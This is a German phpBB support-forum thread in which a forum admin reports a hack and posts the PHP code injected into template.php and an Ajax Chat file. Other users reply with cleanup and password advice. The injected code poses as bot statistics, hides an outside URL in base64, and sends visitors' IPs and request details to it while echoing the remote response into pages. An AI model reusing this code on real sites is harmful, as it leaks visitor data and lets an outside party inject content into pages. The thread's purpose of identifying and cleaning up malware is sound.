phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Forum gehackt?

https://www.phpbb.de/community/viewtopic.php?t=227239

Seite 1 von 1

Forum gehackt?

Verfasst: 22.03.2013 09:02
von dezender
Hallo ich habe seit einiger Zeit das Problem das sich jemand anscheinend an den Forums Datein zu schaffen macht.
Und Zwar bekomme ich von Zeit zu Zeit einen Parse Error welcher aus der template.php kommt wo dieser Code eingeschleust wird

Code: Alles auswählen

            eval(' ?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>' . $this->compiled_code[$handle] . '<?php ');
Mein Forum ist phpBB3 mit Portal 2.0.0 ,NickVergessen Gallery 1.1.6,Classifieds MOD by Kamahl,Impressum Mod,Meeting MOD 2.0.13.2 und Ajax Chat.

In der Ajax Chat index.html ist auch folgender Code eingeschleust

Code: Alles auswählen

<?php
/*
 * @package AJAX_Chat
 * @author Sebastian Tschan
 * @copyright (c) Sebastian Tschan
 * @license GNU Affero General Public License
 * @link https://blueimp.net/ajax/
 */

// Show all errors:
error_reporting(E_ALL);

// Path to the chat directory:
define('AJAX_CHAT_PATH', dirname($_SERVER['SCRIPT_FILENAME']).'/');

// Include custom libraries and initialization code:
require(AJAX_CHAT_PATH.'lib/custom.php');

// Include Class libraries:
require(AJAX_CHAT_PATH.'lib/classes.php');

// Initialize the chat:
$ajaxChat = new CustomAJAXChat();
?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent,$
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.url$
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

Hat jemand vielleicht ne Idee was ich dagegen tun kann um zu verhindern das es in Zukunft wieder passiert ausser Täglich die Datein zu reinigen?

Re: Forum gehackt?

Verfasst: 22.03.2013 09:35
von WileCoyote
In erster Linie wäre es mal von Vorteil, wenn du überprüfen würdest, ob dein lokaler Rechner kompromitiert wurde oder tatsächlich dein Server/Webspace. Daher solltest Du deinen Rechner einer umfassende Virenprüfung mit einem Virenscanner deiner Wahl unterziehen. Weiters wäre es empfehlenswert, eine Überprüfung nach eventuellen Rootkits vorzunehmen. Dafür findest du via Google eine Vielzahl an verschiedenen Tools von verschiedenen Anbietern. Wenn du dir das selbst nicht zutraust, wäre es ratsam eine Fachkraft zu Rate zu ziehen.

Für den Fall, dass tatsächlich der Server betroffen ist:

KBL:gehackt

Re: Forum gehackt?

Verfasst: 22.03.2013 09:43
von dezender
Mein Rechner ist sauber habe ihn mit Kaspersky for MAC untersucht.
Den Root selbst habe ich mit clamscann rkhunter chkrootkit untersucht auch ohne jegliche hinweisse.

Re: Forum gehackt?

Verfasst: 23.03.2013 00:06
von gn#36
Na dann Forum offline nehmen, alle Passwörter ändern, Dateien neu aufsetzen usw.

Re: Forum gehackt?

Verfasst: 23.03.2013 09:37
von zx9r-treiber
Besonders den FTP Zugang zu deinem Server/Webhost verschlüsseln und neues (aufwändiges) Passwort setzen.

Den Adminzugang zu deinem Forum überprüfen und ebenfalls aufwändiges Passwort benutzen ..... nicht das auf dem Weg jemand in dein Forum kommt.

Das gleiche mit der Datenbank.

Mir ist das auch schon passiert und seid dem ändere ich regelmässig alle Passwörter und habe Ruhe vor Hackern.
Alle Zeiten sind UTC+02:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de